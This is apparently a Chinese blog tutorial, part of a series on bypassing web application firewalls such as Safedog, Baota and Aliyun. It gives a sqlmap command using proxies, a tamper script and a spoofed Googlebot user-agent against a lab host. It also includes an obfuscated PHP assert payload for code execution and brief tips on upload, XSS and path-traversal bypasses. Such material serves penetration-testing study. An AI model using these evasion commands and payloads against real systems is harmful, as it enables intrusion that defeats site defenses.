【WAF绕过-4】漏洞利用之注入上传跨站等绕过

在这里插入图片描述

1、SQL注入

如需sqlmap注入测试,
防cc拦截:修改user-agent头+代理(付费代理池)
修改user-agent头:
(1)加参数:--random-agent
(2)加参数:--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
各大搜索引擎的User-Agent:https://www.cnblogs.com/iack/p/3557371.html

在这里插入图片描述

(3)修改配置文件sqlmap.conf中的agent变量值
加代理:--proxy="http:tps123.kdlapi.com:15818"
绕过安全狗:自写tamper模块,参考如下waf-dog.py
绕过Aliyun:基本修改指纹即可(修改user-agent头)
*绕过宝塔:匹配关键字外加/

python sqlmap.py -u "http://test.xiaodi8.com/sqlilabs/Less-2/?id=1" --proxy="http:tps123.kdlapi.com:15818" --tamper="waf-dog.py" --random-agent

2、文件上传
1.php 截断,参考之前payload上传,绕过waf
和前面文件上传专题的绕过方法一样。
3、XSS跨站
利用xss trike绕过,加上–timeout或者–proxy绕过cc

4、RCE执行

加密编码绕过?算法可逆?关键字绕过?提交方法?各种测试?

txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4ce

5、文件包含
以下几种:…\ …/ …\等

涉及资源:
宝塔官网:https://www.bt.cn/
safedog官网:http://free.safedog.cn/website_safedog.html
参考:https://www.cnblogs.com/darkerg/p/14779017.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值